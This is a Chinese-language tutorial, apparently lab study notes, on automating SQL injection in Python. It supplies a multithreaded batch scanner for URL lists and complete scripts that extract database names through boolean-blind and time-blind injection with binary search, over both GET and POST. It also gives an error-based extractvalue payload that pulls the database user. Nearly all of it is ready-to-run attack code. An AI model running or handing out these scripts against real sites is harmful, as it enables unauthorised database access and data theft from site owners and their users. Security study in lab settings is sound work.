批量化脚本编写思路

在理解了联合查询、报错注入、布尔盲注和时间盲注的原理后,我们需要利用编程语言(通常为 Python)来代替人工进行繁琐的穷举和发包。

编写批量化注入脚本通常遵循以下核心流程:

  1. 确定注入点与特征:找出 URL/POST 数据包中的可控参数,明确回显成功/失败的标志(布尔特征)或延时特征(时间特征)。
  2. 构造 Payload 模板:使用字符串格式化(如 {})将需要动态替换的部分(如猜测的字符、长度等)预留出来。
  3. 自动化发包与逻辑判断:利用循环或二分查找算法,不断向目标发送包含 Payload 的请求,并根据响应内容或响应时间提取数据。
  4. 并发与优化:针对批量 URL 扫描或深度数据提取,引入多线程/协程提升速度。

核心库使用

在 Python 中编写 SQL 注入脚本,以下几个标准库和第三方库是必备的:

1. requests 库(网络请求核心)

用于发送 HTTP 请求,支持 GET/POST、自定义 Headers、Cookies 和代理。

import requests
 
# 推荐使用 Session 保持连接池,提升发包速度
session = requests.Session()
# 设置统一的请求头伪造
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'}
# 发送带超时控制的请求(对时间盲注极度重要)
res = session.get(url, headers=headers, timeout=5)
 

2. time 库(时间控制与计算)

主要用于时间盲注中的响应时间判断。

import time

start_time = time.time()
res = requests.get(url)
end_time = time.time()
# 计算请求耗时
if end_time - start_time > 5:
    print("存在时间盲注!")

3. concurrent.futures 库(多线程/并发处理)

在批量扫描多个 URL,或者多字段同时爆破时,单线程效率极低,需要使用线程池。

from concurrent.futures import ThreadPoolExecutor

def check_sqli(url):
    # 具体的检测逻辑
    pass

urls = ["[http://test.com/?id=1](http://test.com/?id=1)", "[http://test.com/?id=2](http://test.com/?id=2)"]
# 开启 10 个线程并发执行
with ThreadPoolExecutor(max_workers=10) as executor:
    executor.map(check_sqli, urls)

通用脚本模板

这是一个用于批量检测多个 URL 是否存在基础 SQL 注入的通用框架模板。包含了参数解析、请求重试、文件读取和多线程等工程化功能。

import requests
import argparse
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlparse
 
# 忽略 HTTPS 证书警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
def verify_sqli(url):
    """
    通用检测函数:测试简单的布尔/报错特征
    """
    payloads = [
        "' AND 1=1--+",
        "' AND 1=2--+"
    ]
    
    try:
        # 测试正常页面
        res_true = requests.get(url + payloads[0], timeout=5, verify=False)
        # 测试异常页面
        res_false = requests.get(url + payloads[1], timeout=5, verify=False)
        
        # 基础的布尔判定逻辑:页面长度不同或者状态码不同
        if len(res_true.text) != len(res_false.text):
            print(f"[+] 发现疑似布尔盲注: {url}")
            return url
    except Exception as e:
        pass
    return None
 
def main():
    parser = argparse.ArgumentParser(description="SQL Injection Batch Scanner")
    parser.add_argument("-f", "--file", help="包含目标 URL 的文本文件", required=True)
    parser.add_argument("-t", "--threads", help="线程数,默认 10", type=int, default=10)
    args = parser.parse_args()
 
    with open(args.file, 'r') as f:
        urls = [line.strip() for line in f if line.strip()]
 
    print(f"[*] 开始扫描,目标总数: {len(urls)},线程数: {args.threads}")
    
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        results = executor.map(verify_sqli, urls)
        
    print("[*] 扫描完成!")
 
if __name__ == "__main__":
    main()

专项实战例子

为了提高效率,强烈建议在盲注中使用二分查找法,而不是从 az 挨个遍历。

1. 布尔盲注利用脚本(结合二分法)

利用基础笔记中 1' and if(substring(database(),1,1)='g',1,0)-- 的原理。此处用字符的 ASCII 码进行大小比较,实现二分查找。

GET方法

import requests

url = "[http://192.168.110.1/?id=1](http://192.168.110.1/?id=1)"
# 页面正常时的标识特征(需要根据实际情况修改)
true_flag = "query success" 

def get_db_length():
    """获取数据库名长度"""
    for i in range(1, 30):
        # 对应基础笔记:id=1' and length(database())=4 --+
        payload = f"' and length(database())={i}--+"
        target = url + payload
        res = requests.get(target)
        if true_flag in res.text:
            print(f"[+] 数据库长度为: {i}")
            return i
    return 0

def get_db_name(length):
    """利用二分法获取数据库名"""
    db_name = ""
    for i in range(1, length + 1):
        low = 32   # 可见字符 ASCII 下限
        high = 126 # 可见字符 ASCII 上限
        
        while low <= high:
            mid = (low + high) // 2
            # 对应基础笔记:id=1' and ascii(substring(database(),1,1))>97 --+
            payload = f"' and ascii(substring(database(),{i},1))>{mid}--+"
            target = url + payload
            res = requests.get(target)
            
            if true_flag in res.text:
                # 页面正常,说明 ASCII 码大于 mid,区间右移
                low = mid + 1
            else:
                # 页面异常,说明 ASCII 码小于等于 mid,区间左移
                high = mid - 1
                
        db_name += chr(low)
        print(f"[*] 当前爆破进度: {db_name}")
        
    print(f"[+] 最终数据库名为: {db_name}")

if __name__ == "__main__":
    length = get_db_length()
    if length > 0:
        get_db_name(length)

POST方法

import requests

# 基础 URL,【关键修改点 1】注意这里不再需要写 ?id= 这种参数了
url = "http://192.168.110.1/index.php" 
# 页面正常时的标识特征(需要根据实际情况修改)
true_flag = "query success"

# 【关键修改点 2】定义 POST 请求中存在注入点的参数名
# 比如网页表单里是 <input name="username">,这里就填 "username"
inject_param = "id"

def get_db_length():
    """获取数据库名长度"""
    for i in range(1, 30):
        # 构造 Payload,注意要包含原始的查询值(比如这里的 1)和闭合符号
        payload = f"1' and length(database())={i}--+"
        
        # 【关键修改点 3】构造 POST 的数据体 (字典格式)
        # 如果需要同时 POST 多个参数(如密码),可以直接加在这个字典里
        # 例如: {inject_param: payload, "password": "123"}
        data = {
            inject_param: payload
        }
        
        # 【关键修改点 4】使用 requests.post(),并通过 data 参数传递数据
        res = requests.post(url, data=data)
        
        if true_flag in res.text:
            print(f"[+] 数据库长度为: {i}")
            return i
    return 0

def get_db_name(length):
    """利用二分法获取数据库名"""
    db_name = ""
    for i in range(1, length + 1):
        low = 32   # 可见字符 ASCII 下限
        high = 126 # 可见字符 ASCII 上限
        
        while low <= high:
            mid = (low + high) // 2
            
            payload = f"1' and ascii(substring(database(),{i},1))>{mid}--+"
            
            data = {
                inject_param: payload
            }
            
            res = requests.post(url, data=data)
            
            if true_flag in res.text:
                # 页面正常,说明 ASCII 码大于 mid,区间右移
                low = mid + 1
            else:
                # 页面异常,说明 ASCII 码小于等于 mid,区间左移
                high = mid - 1
                
        db_name += chr(low)
        print(f"[*] 当前爆破进度: {db_name}")
        
    print(f"[+] 最终数据库名为: {db_name}")

if __name__ == "__main__":
    length = get_db_length()
    if length > 0:
        get_db_name(length)

2. 时间盲注利用脚本

对应基础笔记中 select if(length(database())>1,sleep(5),0) -- 的原理。时间盲注不依赖页面内容的变化,只关注请求的响应时间

import requests
import time

url = "[http://192.168.110.1/?id=1](http://192.168.110.1/?id=1)"
# 设定的延迟阈值
time_threshold = 4 

def get_db_name_by_time(length=8):
    db_name = ""
    for i in range(1, length + 1):
        low = 32
        high = 126
        
        while low <= high:
            mid = (low + high) // 2
            # 构造时间盲注 Payload
            # 注意:时间盲注通常也会结合布尔逻辑的二分法
            payload = f"' and if(ascii(substring(database(),{i},1))>{mid},sleep({time_threshold}),0)--+"
            target = url + payload
            
            try:
                start_time = time.time()
                requests.get(target, timeout=10) # 设置一个较大的 timeout 防止 requests 断开
                end_time = time.time()
                
                # 判断延时是否发生
                if end_time - start_time >= time_threshold:
                    low = mid + 1
                else:
                    high = mid - 1
                    
            except requests.exceptions.Timeout:
                # 如果触发了 timeout 异常,也说明发生了延时
                low = mid + 1
                
        db_name += chr(low)
        print(f"[*] 基于时间的爆破进度: {db_name}")
        
    print(f"[+] 最终数据库名为: {db_name}")

if __name__ == "__main__":
    get_db_name_by_time(length=8) # 假设已知长度为 8

3. 报错注入批量检测脚本

对应基础笔记中的 updatexml, extractvalue, 甚至数学溢出 exp(~(select * from (select user())a)) 等报错。报错注入的优势在于只需一次请求即可带出数据,无需逐字爆破。

import requests
import urllib.parse
import re

def test_error_based(url):
    print(f"[*] 正在测试报错注入: {url}")
    
    # 将基础笔记中的报错 payload 进行 url 编码
    # 使用 0x7e (~) 作为标志符包裹我们要查询的数据 (这里查的是 user())
    raw_payload = "' AND (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+"
    
    # 因为 payload 里有空格、引号、加号等,直接拼接在 URL 后面容易被截断,所以要 URLEncode
    payload = urllib.parse.quote(raw_payload)
    
    target = f"{url}{payload}"
    
    try:
        # 发送请求,设置超时防止卡死
        res = requests.get(target, timeout=5)
        
        # 检查常见的 MySQL 报错特征或自定义的 0x7e(~) 回显
        if "XPATH syntax error" in res.text or "~" in res.text:
            print(f"[!] 确认存在报错注入!")
            
            # 使用正则提取爆出的数据:匹配两个 ~ 之间的所有非 ~ 字符
            # 正则表达式 r"~([^~]+)~" 的意思是:找一个 ~,接着捕获一堆不是 ~ 的字符,直到遇到下一个 ~
            match = re.search(r"~([^~]+)~", res.text)
            
            if match:
                extracted_data = match.group(1)
                print(f"[+] 成功提取数据: {extracted_data}")
            else:
                print("[-] 触发了报错,但未能通过正则精确提取数据。可能是因为页面过滤或回显格式不标准。")
                # 打印前几百个字符辅助人工排查
                # print(f"[*] 原始响应片段: {res.text[:500]}") 
        else:
            print("[-] 未发现报错注入特征。")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] 请求发生网络错误: {e}")

if __name__ == "__main__":
    # 填入你要测试的目标 URL,注意 URL 结尾要留有准备拼接 payload 的参数位,例如 id=1
    test_url = "http://192.168.110.1/?id=1"
    test_error_based(test_url)